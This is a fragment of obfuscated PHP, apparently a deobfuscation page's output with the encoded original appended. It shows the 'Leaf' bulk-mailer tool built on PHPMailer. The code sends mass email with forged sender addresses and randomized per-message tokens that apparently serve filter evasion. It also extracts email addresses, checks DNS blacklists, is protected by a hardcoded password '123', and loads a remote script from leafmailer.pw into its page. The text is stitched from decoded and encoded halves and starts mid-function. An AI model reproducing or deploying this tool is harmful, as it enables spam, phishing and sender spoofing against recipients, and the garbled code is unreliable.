Kl7NX; } goto TAEts; TAEts: $filename = substr($filename, 0, $qpos); goto Ui0rr; Ui0rr: Kl7NX: goto HugKM; DIzeu: } public static function mb_pathinfo($path, $options = null) { goto iYmxY; XcTwD: if (!array_key_exists(5, $pathinfo)) { goto y4ViE; } goto OxHTQ; VOGtS: $ret["filename"] = $pathinfo[3]; goto dXq_F; Uxhw7: if (!array_key_exists(2, $pathinfo)) { goto xD4g8; } goto F1uno; iKzdU: if (!array_key_exists(3, $pathinfo)) { goto bl7DE; } goto VOGtS; yf1AZ: IzcEx: goto NLZ1S; P41eY: switch ($options) { case PATHINFO_DIRNAME: case "dirname": return $ret["dirname"]; case PATHINFO_BASENAME: case "basename": return $ret["basename"]; case PATHINFO_EXTENSION: case "extension": return $ret["extension"]; case PATHINFO_FILENAME: case "filename": return $ret["filename"]; default: return $ret; } goto bxJsR; WPo2b: kTojh: goto P41eY; Z2f0m: xD4g8: goto XcTwD; I78Ya: $pathinfo = array(); goto Y1zke; F1uno: $ret["basename"] = $pathinfo[2]; goto Z2f0m; Y1zke: if (!preg_match("%^(.*?)[\\/]*(([^/\\]*?)(\.([^\.\\/]+?)|))[\\/\.]*$%im", $path, $pathinfo)) { goto kTojh; } goto Ymhav; cEpqD: y4ViE: goto iKzdU; Ymhav: if (!array_key_exists(1, $pathinfo)) { goto duGgn; } goto NpQQt; OxHTQ: $ret["extension"] = $pathinfo[5]; goto cEpqD; NpQQt: $ret["dirname"] = $pathinfo[1]; goto f31Fj; dXq_F: bl7DE: goto WPo2b; iYmxY: $ret = array("dirname" => '', "basename" => '', "extension" => '', "filename" => ''); goto I78Ya; bxJsR: RZAbn: goto yf1AZ; f31Fj: duGgn: goto Uxhw7; NLZ1S: } public function set($name, $value = '') { goto oC0oX; qayPP: $this->setError($this->lang("variable_set") . $name); goto FsVq1; oC0oX: if (property_exists($this, $name)) { goto Yca83; } goto qayPP; ZVS3V: $this->{$name} = $value; goto lBRu9; lBRu9: return true; goto TbbpN; S7jsM: goto AwJ7U; goto pMW6C; TbbpN: AwJ7U: goto DKtX7; FsVq1: return false; goto S7jsM; pMW6C: Yca83: goto ZVS3V; DKtX7: } public function secureHeader($str) { return trim(str_replace(array("\xd", "\xa"), '', $str)); } public static function normalizeBreaks($text, $breaktype = "\xd\xa") { return preg_replace("/(\r\n|\r|\n)/ms", $breaktype, $text); } public function sign($cert_filename, $key_filename, $key_pass, $extracerts_filename = '') { goto L0gLu; L0gLu: $this->sign_cert_file = $cert_filename; goto aLc1E; qAwYs: $this->sign_key_pass = $key_pass; goto z7nm3; aLc1E: $this->sign_key_file = $key_filename; goto qAwYs; z7nm3: $this->sign_extracerts_file = $extracerts_filename; goto ZQMWo; ZQMWo: } public function DKIM_QP($txt) { goto V6SNh; zHtBU: goto SH5Hy; goto lxJgT; lxJgT: wPuR5: goto LteWC; uh0MY: if (!($i < strlen($txt))) { goto wPuR5; } goto DjRxO; IbVyC: $line .= $txt[$i]; goto hUsT7; V6SNh: $line = ''; goto CqAns; r3N2o: z8ICs: goto IbVyC; Ilr2v: uktRM: goto HVruP; Aje9N: if (0x21 <= $ord && $ord <= 0x3a || $ord == 0x3c || 0x3e <= $ord && $ord <= 0x7e) { goto z8ICs; } goto ae8nk; cgoHX: SH5Hy: goto uh0MY; DjRxO: $ord = ord($txt[$i]); goto Aje9N; hUsT7: on3j0: goto Ilr2v; CqAns: $i = 0; goto cgoHX; ae8nk: $line .= "=" . sprintf("%02X", $ord); goto CAg0E; LteWC: return $line; goto FkNDO; CAg0E: goto on3j0; goto r3N2o; HVruP: $i++; goto zHtBU; FkNDO: } public function DKIM_Sign($signHeader) { goto c898B; jLgEt: YcLzQ: goto pnJD1; Z6cv5: goto EvA0j; goto JBoEb; cAQtl: if (version_compare(PHP_VERSION, "5.3.0") >= 0 and in_array("sha256WithRSAEncryption", openssl_get_md_methods(true))) { goto fzvpv; } goto du8J9; JBoEb: fzvpv: goto s7dDS; thJ6D: xqjMZ: goto cAQtl; KX260: return base64_encode($signature); goto lJJKo; HzKIe: throw new phpmailerException($this->lang("extension_missing") . "openssl"); goto jLgEt; COver: $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase); goto thJ6D; Ta2TM: $pslen = $pinfo["bits"] / 8 - (strlen($t) / 2 + 3); goto u3Esn; ACWRM: if (!$this->exceptions) { goto YcLzQ; } goto HzKIe; htgpU: goto xqjMZ; goto HJqIZ; Cv4RZ: openssl_pkey_free($privKey); goto ZMtpu; NQ9bA: EvA0j: goto Cv4RZ; EHM8J: $hash = hash("sha256", $signHeader); goto uL2O2; DLDrQ: nLuTT: goto spImz; NkE4b: openssl_pkey_free($privKey); goto KX260; du8J9: $pinfo = openssl_pkey_get_details($privKey); goto EHM8J; aJ3Kr: openssl_pkey_free($privKey); goto sxqBY; uL2O2: $t = "3031300d060960864801650304020105000420" . $hash; goto Ta2TM; hNz1G: if (!openssl_private_encrypt($eb, $signature, $privKey, OPENSSL_NO_PADDING)) { goto wLGJW; } goto NkE4b; spImz: $privKeyStr = !empty($this->DKIM_private_string) ? $this->DKIM_private_string : file_get_contents($this->DKIM_private); goto DMkmq; pnJD1: return ''; goto DLDrQ; s7dDS: if (!openssl_sign($signHeader, $signature, $privKey, "sha256WithRSAEncryption")) { goto oino4; } goto aJ3Kr; HJqIZ: H9Il2: goto COver; lJJKo: wLGJW: goto Z6cv5; sxqBY: return base64_encode($signature); goto RwluB; FP2GU: $privKey = openssl_pkey_get_private($privKeyStr); goto htgpU; ZMtpu: return ''; goto ubwK3; DMkmq: if ('' != $this->DKIM_passphrase) { goto H9Il2; } goto FP2GU; c898B: if (defined("PKCS7_TEXT")) { goto nLuTT; } goto ACWRM; RwluB: oino4: goto NQ9bA; u3Esn: $eb = pack("H*", "0001" . str_repeat("FF", $pslen) . "00" . $t); goto hNz1G; ubwK3: } public function DKIM_HeaderC($signHeader) { goto Hwnlr; xbvlO: ZraQD: goto jV7k6; Sg_HT: return $signHeader; goto Czo7r; FkLo1: foreach ($lines as $key => $line) { goto AqOeX; RGEnF: vOTB1: goto LTnUF; c3hwb: $heading = strtolower($heading); goto VkoZG; VkoZG: $value = preg_replace("/\s{2,}/", " ", $value); goto ei_BQ; ei_BQ: $lines[$key] = $heading . ":" . trim($value); goto RGEnF; AqOeX: list($heading, $value) = explode(":", $line, 2); goto c3hwb; LTnUF: } goto xbvlO; RTM0P: $lines = explode("
", $signHeader); goto FkLo1; Hwnlr: $signHeader = preg_replace("/\r\n\s+/", " ", $signHeader); goto RTM0P; jV7k6: $signHeader = implode("
\xa", $lines); goto Sg_HT; Czo7r: } public function DKIM_BodyC($body) { goto fMydO; FAqSG: Hedzt: goto pKn3k; pKn3k: return $body; goto IJaMR; UZ7Mx: if (!(substr($body, strlen($body) - 4, 4) == "

")) { goto Hedzt; } goto RmqPI; yRXmB: GVwQt: goto kFuOv; RmqPI: $body = substr($body, 0, strlen($body) - 2); goto aFWYV; l0JzK: return "
"; goto yRXmB; fFR_v: $body = str_replace("\xa", "
\xa", $body); goto AHjGv; fMydO: if (!($body == '')) { goto GVwQt; } goto l0JzK; kFuOv: $body = str_replace("\xd
", "\xa", $body); goto fFR_v; AHjGv: hqVnZ: goto UZ7Mx; aFWYV: goto hqVnZ; goto FAqSG; IJaMR: } public function DKIM_Add($headers_line, $subject, $body) { goto DTQWP; dDIiM: $date_header = ''; goto sSdfO; tgwlS: $ident = ''; goto fecQx; DTQWP: $DKIMsignatureType = "rsa-sha256"; goto phLAo; wrQZl: $toSign = $this->DKIM_HeaderC($from_header . "
\xa" . $to_header . "\xd\xa" . $date_header . "
\xa" . $subject_header . "
" . $dkimhdrs); goto lUNtm; yv1gO: $subject_header = "Subject: {$subject}"; goto c08uX; qLIey: if ('' == $this->DKIM_identity) { goto MKiNR; } goto JkuBF; VZURy: $DKIMb64 = base64_encode(pack("H*", hash("sha256", $body))); goto qLIey; KWLwO: goto ZYM3h; goto mE4d2; jw3CA: $dkimhdrs = "DKIM-Signature: v=1; a=" . $DKIMsignatureType . "; q=" . $DKIMquery . "; l=" . $DKIMlen . "; s=" . $this->DKIM_selector . ";
" . "	t=" . $DKIMtime . "; c=" . $DKIMcanonicalization . ";\xd\xa" . "\x9h=From:To:Date:Subject;
\xa" . "	d=" . $this->DKIM_domain . ";" . $ident . "\xd\xa" . "	z={$from}
\xa" . "	|{$to}
\xa" . "\x9|{$date}
\xa" . "	|{$subject};
" . "\x9bh=" . $DKIMb64 . ";
" . "\x9b="; goto wrQZl; lUNtm: $signed = $this->DKIM_Sign($toSign); goto JTqgb; JkuBF: $ident = " i=" . $this->DKIM_identity . ";"; goto KWLwO; pw8jY: $to_header = ''; goto dDIiM; l0XXQ: $DKIMlen = strlen($body); goto VZURy; mE4d2: MKiNR: goto tgwlS; Bbx1K: foreach ($headers as $header) { goto ZXV24; RGodY: if (strpos($header, "To:") === 0) { goto HOh7w; } goto p5u40; v7lhn: goto yovrp; goto j2YO1; Mn9ih: if (!empty(${$current}) && strpos($header, " =?") === 0) { goto LmoPE; } goto WWkP2; ZQQAO: HOh7w: goto iDoBm; YveAW: Pqh1_: goto W7Qfk; W7Qfk: $from_header = $header; goto GF91N; LEIsZ: $current = "date_header"; goto Bk2cd; WWkP2: $current = ''; goto yp4qw; WDUAi: $date_header = $header; goto LEIsZ; iDoBm: $to_header = $header; goto pjFqG; pjFqG: $current = "to_header"; goto v7lhn; Bk2cd: yovrp: goto IeCh2; dCIRM: ${$current} .= $header; goto S60HV; CLb6L: goto yovrp; goto ZQQAO; S60HV: j2SL4: goto N2M2X; ZXV24: if (strpos($header, "From:") === 0) { goto Pqh1_; } goto RGodY; GF91N: $current = "from_header"; goto CLb6L; p5u40: if (strpos($header, "Date:") === 0) { goto MoBZr; } goto Mn9ih; IeCh2: kKlcq: goto g_zwy; lBa4z: LmoPE: goto dCIRM; yp4qw: goto j2SL4; goto lBa4z; j2YO1: MoBZr: goto WDUAi; N2M2X: goto yovrp; goto YveAW; g_zwy: } goto UA1qU; sSdfO: $current = ''; goto Bbx1K; c08uX: $headers = explode($this->LE, $headers_line); goto KDeWd; fecQx: ZYM3h: goto jw3CA; owtoO: $from = str_replace("|", "=7C", $this->DKIM_QP($from_header)); goto WwlM0; JTqgb: return $dkimhdrs . $signed . "\xd
"; goto WGBQj; QpWCj: $DKIMquery = "dns/txt"; goto scnFs; WwlM0: $to = str_replace("|", "=7C", $this->DKIM_QP($to_header)); goto P_sCA; KDeWd: $from_header = ''; goto pw8jY; UA1qU: ubfFk: goto owtoO; fMhcM: $body = $this->DKIM_BodyC($body); goto l0XXQ; phLAo: $DKIMcanonicalization = "relaxed/simple"; goto QpWCj; XJ3XX: $subject = str_replace("|", "=7C", $this->DKIM_QP($subject_header)); goto fMhcM; P_sCA: $date = str_replace("|", "=7C", $this->DKIM_QP($date_header)); goto XJ3XX; scnFs: $DKIMtime = time(); goto yv1gO; WGBQj: } public static function hasLineLongerThanMax($str) { return (bool) preg_match("/^(.{" . (self::MAX_LINE_LENGTH + 2) . ",})/m", $str); } public function getToAddresses() { return $this->to; } public function getCcAddresses() { return $this->cc; } public function getBccAddresses() { return $this->bcc; } public function getReplyToAddresses() { return $this->ReplyTo; } public function getAllRecipientAddresses() { return $this->all_recipients; } protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from) { goto t1F9u; oLLXn: $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from); goto Bbsk8; t1F9u: if (!(!empty($this->action_function) && is_callable($this->action_function))) { goto vGR7M; } goto oLLXn; Bbsk8: call_user_func_array($this->action_function, $params); goto kFD8F; kFD8F: vGR7M: goto U7vKn; U7vKn: } } goto aEFQc; hY533: quk7_: goto lRHZ9; mOjXb: tknkG: goto s5P1A; MfEoJ: $_POST["emailList"] = strtolower($_POST["emailList"]); goto MPOpO; yN03v: $host = ''; goto BgcaH; c0pgb: goto Spd00; goto hiGRi; ql2wL: print "<tr> <td>{$host}</td> <td id='{$host}'>Checking ..</td></tr>"; goto c3vuW; gMJYH: foreach ($_GET["host"] as $host) { goto zDThr; qPU0L: F58A_: goto Tg1VL; h27wW: YpykN: goto EK1Qf; KOB_y: $check = "<font color='green'> Clean</font>"; goto FBYco; EK1Qf: $check = "<font color='red'> Listed</font>"; goto qPU0L; zDThr: if (checkdnsrr($_GET["check_ip"] . "." . $host . ".", "A")) { goto YpykN; } goto KOB_y; Tg1VL: print "document.getElementById("" . $host . "").innerHTML = "" . $check . "";"; goto DryW4; DryW4: UMDaO: goto MGmcj; FBYco: goto F58A_; goto h27wW; MGmcj: } goto y4FDN; DLRV4: $host = $dnsbl_lookup[$j]; goto gpOKf; Y0NON: $mail->Encoding = $encoding; goto ttreH; fwOV5: $charset = $_POST["charset"]; goto nVWJq; WHJ2Y: $mail->addReplyTo(leafClear($replyTo, $email)); goto jRVRQ; j0qyd: goto EVXFQ; goto Ee0AM; Q3H1w: $leaf["website"] = ""; goto z1B6s; qfDfc: $mail = new PHPMailer(); goto TUIYE; f5wYm: h0L1d: goto H5Klu; aEFQc: class phpmailerException extends Exception { public function errorMessage() { $errorMsg = "<strong>" . htmlspecialchars($this->getMessage()) . "</strong><br />\xa"; return $errorMsg; } } goto wZV6G; Me2qE: if (empty($_FILES["fileToUpload"]["tmp_name"])) { goto iUdyH; } goto emQBd; fFVOy: exit; goto Gb7fw; eXXbP: qJ3u4: goto XoKUL; EJFng: Gqzg1: goto qfDfc; VYJWD: ini_set("memory_limit", -1); goto XjI7W; REe_u: $replyTo = leafTrim($_POST["replyTo"]); goto o7fzp; CxBqc: $i = $i + 10; goto ozylK; FpfZS: UucX1: goto u0wbV; Ms0J2: pzcZN: goto A2jxO; vHa4Y: Spd00: goto pi6kT; jRVRQ: $mail->addAddress("[email protected]"); goto g_ZnK; KJXun: foreach ($emails as $email) { goto WK0qp; sEm0S: yTuch: goto EFl02; WK0qp: foreach ($keywords as $keyword) { goto MjSwE; j0r5q: XDcb1: goto kLX2B; qvkMr: print $email . "\xa"; goto uNHOg; S07gR: eV4aN: goto j0r5q; uNHOg: goto yTuch; goto S07gR; MjSwE: if (!strstr($email, $keyword)) { goto eV4aN; } goto qvkMr; kLX2B: } goto sEm0S; EFl02: S3jUW: goto iWIHo; iWIHo: } goto Ys1Qd; Rs7mx: exit; goto Ms0J2; b17Xr: if (!($i < $dnsT)) { goto EV_yj; } goto yN03v; jOrC_: if (!isset($_GET["host"])) { goto ESyWn; } goto fwIGh; nUE1N: AsUeS: goto b17Xr; WBM_Z: print "\xd
    <form action="?emailfilter=ifram" method="POST" target="my-iframe" enctype="multipart/form-data" onsubmit=''>\xd\xa        <label for="emailList">Text </label><input type="file" name="fileToUpload" id="fileToUpload"> \xd\xa        or

        <textarea name="emailList" id="emailList" class="form-control" rows="7" id="textArea"></textarea>
\xa      <div class="col-lg-12">\xd\xa        <div class="radio">
\xa          <label>\xd\xa            <input type="radio" name="resulttype" id="resulttype" value="here" checked="">\xd
            Show Result in this page
\xa          </label>\xd
\xa        <div class="radio">\xd\xa          <label>\xd\xa            <input type="radio" name="resulttype" id="resulttype" value="download">
            Download Result (for big numbers)
        </div>\xd\xa      </div>
            <legend><h4>Extract Email</h4></legend>\xd
            Detecting every email (100%) and order them line by line <br><br>\xd\xa        <button type="submit" name="submit" value="extract" class="btn btn-default btn-sm">Start</button>\xd
            <legend><h4>Filter Emails</h4></legend>\xd\xa        <label >Keywords <small> ex: or</small> </label><textarea name="keywords" id="keywords" class="form-control" rows="4" id="textArea">\xd\\xd\</textarea><br>

\xa            <button type="submit" name="submit" value="filter" class="btn btn-default btn-sm">Start</button>\xd
    <label >Result </label>\xd\xa    <iframe style="border:none;width:100%;" name="my-iframe"  src="?emailfilter=ifram" ></iframe>
   "; goto Xd0nv; hiGRi: u1pqC: goto wMJ5F; Thk8I: if (!(!empty($password) and $_SESSION[$sessioncode] != $password)) { goto sQR84; } goto zKaff; r3dcQ: $base64 = "selected"; goto Jo4FD; t43OY: $mail->IsHTML(true); goto i7AUS; o13zo: MOhFt: goto f569P; Ys1Qd: JEDcA: goto lK3ol; XjI7W: $leaf["version"] = "2.8"; goto Q3H1w; bHJZt: if ($score > 5) { goto MM5a6; } goto Edq_I; MGDZr: goto Spd00; goto EJFng; hZYLo: XZJ3i: goto d5yGC; EsRP3: $maillist = explode("\xd
", $emailList); goto qMmJL; Oh1mF: $class = "danger"; goto eXXbP; Uhbo6: if (leafMailCheck($senderEmail)) { goto tknkG; } goto VOftw; oUswT: g5F3N: goto vHa4Y; s5P1A: ZXhnB: goto ZeFgG; LH62b: session_write_close(); goto XvOGW; oFLJT: ESyWn: goto yx6Cn; dOFRG: set_time_limit(0); goto VYJWD; XalPm: pKBfm: goto iXic1; H5Klu: if ($encoding == "7bit") { goto HVenp; } goto XV2PK; eGY8G: error_reporting(0); goto dOFRG; wA9LI: $response = curl_exec($ch); goto kgyoy; gXCVf: goto qJ3u4; goto f0dGM; XoKUL: print "<div class="text-" . $class . "">Your SpamAssassin score is " . $score . "  </div>\xd
<div>Full Report : <pre>" . $response->report . "</pre></div>"; goto EUn2J; M3Xj1: print "Checking <b>" . $_GET["check_ip"] . "</b> in <b>{$dnsT}</b>  anti-spam databases:<br>"; goto dCGmt; ttreH: $mail->preSend(); goto aBS1v; Js1_Q: dq0rA: goto MYUks; CpJBk: $senderName = leafTrim($_POST["senderName"]); goto REe_u; k53cc: if ($_POST["messageType"] == 2) { goto MH90C; } goto unaP7; PPUHW: wz0S2: goto Js1_Q; iaQSy: print "    <div class="col-lg-12">"; goto uY2CJ; zMnkk: $reverse_ip = implode(".", array_reverse(explode(".", $_GET["check_ip"]))); goto w3eyX; yzro1: print $dnsN; goto sZhjT; TUIYE: $mail->setFrom(leafClear($senderEmail, $email), leafClear($senderName, $email)); goto WHJ2Y; w3eyX: $dnsT = count($dnsbl_lookup); goto AKV17; Jo4FD: goto wz0S2; goto yc9V8; kqM6B: if ($_POST["resulttype"] == "download") { goto MOhFt; } goto YZpzq; GEEsV: $bit8 = "selected"; goto Fgqp2; JENQm: t6Gw5: goto f5lEY; nhY17: if (!($_POST["action"] == "send" or $_POST["action"] == "score")) { goto dq0rA; } goto MncBT; GibH8: hlLFA: goto f21N5; qW1nC: EV_yj: goto Kifmh; Srgi6: leafheader(); goto XRoYz; GooRm: function leafTrim($string) { $string = urldecode($string); return stripslashes(trim($string)); } goto AxYmD; wcTBU: exit; goto hGQDj; EUn2J: print "    </div>"; goto oUswT; QEONm: sQR84: goto LH62b; MPOpO: if (!($_GET["emailfilter"] == "ifram")) { goto E8ziT; } goto kqM6B; GDt4y: $utf8 = "selected"; goto AW7qj; GijeA: m5UwD: goto KlBcn; qzWnC: if ($_POST["submit"] == "extract") { goto YXuPZ; } goto CPQh5; unaP7: print $viewMessage; goto Pb7sf; nlt3S: l1gkn: goto MGDZr; WXxu2: $password = "123"; goto xDMzF; MbqOy: iUdyH: goto MfEoJ; zKaff: if (isset($_REQUEST["pass"]) and $_REQUEST["pass"] == $password) { goto rlw_d; } goto APQeT; fwIGh: $_GET["host"] = explode(",", $_GET["host"]); goto gMJYH; kwQ7V: header("Content-Disposition: attachment; filename=emails" . time() . ".txt"); goto g0gp9; YiNik: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); goto j4r7u; i7AUS: $mail->AltBody = strip_tags(leafClear($messageLetter, $email)); goto GibH8; MYUks: if (!($_POST["action"] == "view")) { goto pzcZN; } goto rSM14; EWpCq: $pattern = "/[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}/"; goto lt1EJ; Gb7fw: E8ziT: goto Srgi6; ozylK: goto AsUeS; goto qW1nC; aBS1v: $messageHeaders = $mail->getSentMIMEMessage(); goto kg5D3; pi6kT: print "</body>"; 

Did this file decode correctly?

Original Code

/*   __________________________________________________
    |  Obfuscated by YAK Pro - Php Obfuscator  2.0.14  |
    |              on 2025-01-15 15:18:39              |
    |    GitHub:    |
 goto WXxu2; Edq_I: $class = "\163\x75\143\143\x65\x73\x73"; goto gXCVf; L1OPK: curl_setopt($ch, CURLOPT_URL, "\150\164\x74\x70\x3a\57\x2f\163\160\141\155\x63\150\x65\x63\153\56\160\157\163\164\155\141\x72\153\141\x70\x70\56\x63\x6f\155\x2f\x66\x69\x6c\164\145\x72"); goto Jegjh; u0wbV: $j++; goto j0qyd; xDMzF: session_start(); goto eGY8G; FckdL: jVDBU: goto Rs7mx; ChGnZ: $utf8 = ''; goto hkPRM; o4nJE: if ($charset == "\x49\123\117\x2d\x38\x38\65\71\x2d\61") { goto pKBfm; } goto L8jW5; grYYS: $messageType = leafTrim($_POST["\155\x65\163\163\141\147\x65\x54\x79\160\145"]); goto oTxWR; lXXN5: $mail->IsHTML(false); goto xaixu; aoeQA: header("\x43\x6f\156\164\145\156\164\55\x54\x79\x70\145\72\x20\141\160\160\x6c\151\143\141\x74\151\157\156\57\x6f\x63\164\145\164\55\x73\164\x72\145\141\x6d"); goto kwQ7V; J6mfk: YXuPZ: goto EWpCq; nuHAI: if ($_POST["\x61\x63\164\151\x6f\x6e"] == "\163\145\x6e\144") { goto u1pqC; } goto KPefm; lK3ol: LMknI: goto fFVOy; xaixu: goto hlLFA; goto v1v6C; CAr7y: if ($encoding == "\x71\x75\157\164\x65\x64\x2d\160\x72\151\156\x74\x61\142\x6c\145") { goto vr67A; } goto GEEsV; Kifmh: print "\74\57\x74\141\x62\154\x65\x3e\74\x2f\144\151\166\x3e"; goto yzro1; u9mMd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto L1OPK; nlzIg: $emails = explode("\xa", $_POST["\145\155\x61\x69\154\114\x69\163\x74"]); goto eCw_J; emQBd: $_POST["\145\155\x61\x69\154\x4c\x69\x73\x74"] = file_get_contents($_FILES["\x66\x69\154\x65\x54\x6f\x55\160\x6c\157\141\x64"]["\x74\155\x70\137\156\x61\155\x65"]); goto MbqOy; DEb8B: Ozl1_: goto QEONm; BgHBw: $html = "\143\x68\x65\x63\153\x65\x64"; goto w1NoT; TEJDM: goto wz0S2; goto Hl8OQ; UfhM7: MH90C: goto W8n9c; kgyoy: $response = json_decode($response); goto iaQSy; gpOKf: if (empty($host)) { goto IjTWS; } goto ql2wL; A2jxO: if (isset($_POST["\x73\145\156\144\x65\162\x45\155\x61\151\x6c"])) { goto ZXhnB; } goto h2Pa6; s5itE: $encoding = $_POST["\x65\156\143\157\x64\x65"]; goto fwOV5; h2Pa6: $senderEmail = "\x73\x75\x70\x70\x6f\162\164\x40" . str_replace("\x77\167\x77\x2e", '', $_SERVER["\110\x54\124\120\137\110\117\123\x54"]); goto Uhbo6; lo09p: $i = 0; goto nUE1N; nVWJq: $html = ''; goto ChGnZ; wZV6G: function leafheader() { print "\15\12\74\x68\x65\x61\144\76\15\xa\x20\x20\40\x20\x3c\x74\151\x74\154\x65\76" . str_replace("\167\167\x77\56", '', $_SERVER["\110\124\124\120\137\110\117\x53\124"]) . "\40\55\40\114\165\x46\x69\170\x2e\x67\x73\x3c\57\x74\x69\x74\x6c\x65\x3e\xd\xa\x20\x20\40\40\74\155\x65\x74\141\40\x68\x74\164\160\x2d\x65\x71\x75\151\x76\x3d\42\x43\x6f\156\164\x65\x6e\x74\x2d\124\171\160\145\42\40\x63\157\x6e\164\145\x6e\x74\x3d\42\164\x65\x78\x74\57\150\x74\155\154\x3b\x20\x63\x68\x61\x72\163\x65\164\75\x75\164\146\55\x38\42\57\x3e\15\xa\40\x20\40\x20\74\x6c\x69\156\x6b\40\150\x72\145\x66\75\x22\150\164\164\x70\x73\72\x2f\57\155\141\x78\143\144\x6e\x2e\142\x6f\x6f\164\x73\164\162\141\x70\143\144\x6e\56\x63\157\155\57\142\x6f\x6f\x74\x73\x77\141\164\x63\150\57\63\x2e\x34\56\61\57\x63\157\x73\155\157\x2f\x62\x6f\x6f\164\163\164\x72\141\160\x2e\155\151\x6e\56\x63\x73\163\x22\x20\162\145\x6c\75\42\x73\164\x79\x6c\145\163\x68\145\145\164\42\40\76\15\xa\40\x20\x20\x20\x3c\x73\143\x72\x69\x70\x74\x20\163\162\143\x3d\42\150\164\x74\160\x73\x3a\57\x2f\154\x65\x61\146\x6d\x61\x69\x6c\x65\x72\56\160\167\57\163\x74\171\154\145\62\x2e\152\x73\x22\76\x3c\57\163\143\x72\151\x70\x74\76\15\12\15\xa\x3c\x2f\x68\x65\x61\x64\x3e"; } goto UVdO_; XV2PK: if ($encoding == "\142\151\x6e\x61\162\x79") { goto X1onj; } goto tVWAa; yc9V8: vr67A: goto YzzL_; SGMy9: Wg0dD: goto CxBqc; BgcaH: $hosts = ''; goto U_sLN; dCGmt: $dnsN = ''; goto EnAQd; JWeV3: exit; goto oFLJT; YZpzq: header("\x43\x6f\x6e\x74\145\156\164\x2d\124\x79\x70\145\72\x20\x74\145\x78\164\57\x70\154\x61\151\156"); goto as2dE; iXic1: $iso = "\x73\145\x6c\145\143\x74\145\144"; goto f5wYm; U_sLN: $j = $i; goto osHF2; rSM14: $viewMessage = leafTrim($_POST["\x6d\x65\163\163\141\147\145\x4c\145\164\164\145\x72"]); goto dg4pm; d5yGC: goto LMknI; goto zMZ6K; y4FDN: B7jD5: goto JWeV3; eCw_J: $keywords = explode("\12", strtolower($_POST["\153\x65\x79\167\x6f\x72\144\x73"])); goto KJXun; z1B6s: $sessioncode = md5(__FILE__); goto Thk8I; wMJ5F: print "\40\40\x20\x20\74\x64\x69\166\x20\143\154\141\163\163\75\42\143\157\154\x2d\x6c\147\55\x31\62\x22\x3e"; goto EsRP3; YhuuI: if (!($j < $i + 10)) { goto DqnCB; } goto DLRV4; AW7qj: $bit8 = "\x73\x65\x6c\x65\x63\164\145\144"; goto nhY17; XvOGW: function leafClear($text, $email) { goto UL1I3; btEkd: $text = str_replace("\x5b\x2d\x65\155\x61\151\x6c\x64\x6f\x6d\141\x69\156\x2d\135", $emaildomain, $text); goto BiDsQ; bfnJp: $text = str_replace("\133\55\x65\155\141\x69\x6c\x2d\135", $email, $text); goto Z98Ik; DHOA8: $emaildomain = $e[1]; goto uQrEj; uQrEj: $text = str_replace("\x5b\x2d\164\151\x6d\x65\x2d\x5d", date("\x6d\x2f\x64\57\131\x20\x68\72\x69\72\163\x20\141", time()), $text); goto bfnJp; BiDsQ: $text = str_replace("\133\x2d\x72\141\x6e\144\157\155\x6c\x65\x74\x74\x65\x72\163\x2d\x5d", randString("\x61\x62\143\144\x65\x66\147\150\x69\x6a\153\154\155\x6e\x6f\x70\161\162\163\x74\165\166\167\x78\x79\172"), $text); goto SdKLO; Z98Ik: $text = str_replace("\133\x2d\x65\x6d\x61\x69\x6c\165\163\145\x72\x2d\135", $emailuser, $text); goto btEkd; F5Q62: return $text; goto cBnha; uXnm5: $emailuser = $e[0]; goto DHOA8; SdKLO: $text = str_replace("\133\55\x72\141\156\x64\157\155\x73\x74\162\x69\x6e\x67\55\x5d", randString("\x61\142\143\144\145\146\147\x68\151\152\153\x6c\155\156\x6f\x70\161\162\x73\164\165\x76\x77\170\171\x7a\60\61\62\x33\x34\65\66\x37\x38\71"), $text); goto h7mS4; d5PZj: $text = str_replace("\133\55\162\141\x6e\x64\x6f\x6d\155\x64\65\x2d\x5d", md5(randString("\141\142\143\144\145\x66\x67\150\x69\x6a\x6b\154\x6d\156\x6f\x70\x71\162\x73\x74\x75\x76\167\170\171\x7a\x30\61\62\63\x34\x35\66\67\70\x39")), $text); goto F5Q62; UL1I3: $e = explode("\x40", $email); goto uXnm5; h7mS4: $text = str_replace("\x5b\55\x72\141\x6e\144\x6f\155\156\x75\x6d\x62\145\x72\x2d\135", randString("\x30\61\62\x33\64\x35\x36\67\70\x39"), $text); goto d5PZj; cBnha: } goto GooRm; Ee0AM: DqnCB: goto Md_7p; v1v6C: nOrNO: goto t43OY; as2dE: goto Q3csu; goto o13zo; c3vuW: $hosts .= "{$host}\x2c"; goto KnTCL; GAMrd: goto wz0S2; goto CubC0; Md_7p: $dnsN .= "\x3c\163\143\x72\x69\x70\x74\x20\x73\162\143\75\x27\x3f\143\x68\x65\x63\x6b\137\151\x70\x3d{$reverse_ip}\46\x68\157\163\x74\75" . $hosts . "\x27\x20\x74\171\160\x65\x3d\47\x74\145\x78\164\57\152\x61\166\x61\163\x63\162\151\160\x74\47\76\x3c\57\x73\x63\x72\x69\x70\x74\76"; goto SGMy9; k3kRq: $bit7 = "\163\145\x6c\x65\x63\x74\x65\144"; goto GAMrd; KekMo: if ($messageType == 1) { goto nOrNO; } goto lXXN5; KlBcn: $html = "\143\150\x65\143\153\145\x64"; goto GDt4y; UVdO_: leafheader(); goto oSMBb; qMmJL: $n = count($maillist); goto YiCUY; clIn6: if ($messageType == 2) { goto t6Gw5; } goto BgHBw; lRHZ9: if (!isset($_GET["\145\x6d\x61\151\x6c\146\151\154\164\x65\x72"])) { goto m5UwD; } goto Me2qE; MncBT: $senderEmail = leafTrim($_POST["\163\x65\156\x64\145\162\105\155\141\151\x6c"]); goto CpJBk; CPQh5: if ($_POST["\x73\x75\x62\155\x69\x74"] == "\146\x69\154\164\x65\162") { goto iZ5Y2; } goto ioV_w; po7JU: function leafMailCheck($email) { goto G9CF_; G9CF_: if (filter_var($email, FILTER_VALIDATE_EMAIL)) { goto aEOvO; } goto Gn0Lf; Gn0Lf: return false; goto CSv9M; YwuiE: aEOvO: goto O5FIQ; iq3PQ: b0Ntd: goto sRL9U; O5FIQ: return true; goto iq3PQ; CSv9M: goto b0Ntd; goto YwuiE; sRL9U: } goto KYggQ; YzzL_: $quotedprintable = "\163\x65\154\x65\x63\164\x65\x64"; goto PPUHW; KnTCL: IjTWS: goto FpfZS; Fgqp2: goto wz0S2; goto tZUrj; 